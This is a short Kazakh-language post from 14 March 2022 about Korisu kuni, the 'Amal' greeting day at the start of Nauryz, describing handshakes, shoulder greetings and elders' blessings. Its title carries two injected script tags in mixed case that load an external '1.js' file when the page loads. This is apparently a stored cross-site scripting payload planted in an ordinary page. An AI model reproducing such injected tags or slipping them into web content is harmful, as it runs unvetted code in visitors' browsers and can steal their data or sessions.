14 наурыз - КӨРІСУ КҮНІ!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.03.2022

Бүгін – Көрісу күні 👋 📍Бұл күні қыстан аман шыққан ағайын бір-бірімен амандасып, қол алысып, «Жасың құтты болсын!» деп тілек айтады.

✅Еліміздің батыс өңірінің тұрғындары Наурыз мерекесін тойлауды бастап кетті. Бүгін – Көрісу күні немесе «Амал» мерекесі.

✅Бұл күні қыстан аман шыққан ағайын бір-бірімен амандасып, қол алысып, «Жасың құтты болсын!» деп тілек айтады.

✅Әсіресе, жасы кішілер қала-ауылдағы ақсақал-әжелердің үйіне барып, көрісіп, ілтипат білдіреді. Жасы үлкендер кішілерге бата береді. Сондай-ақ, үлкендер қол алысып, алақандарын айқастырып жатса, әйел адамдар алдымен оң иығын, сосын сол иығын түйістіреді.

✅«Амал» мерекесі жаңа өмір, жаңа жыл, жаңа күнмен көрісу деген мағынаны білдіреді 🔊Жастарыңыз құтты болсын, ағайын!

  

Просмотров: 443


Пікір қосу



Деректерді қолтаңбаға қосу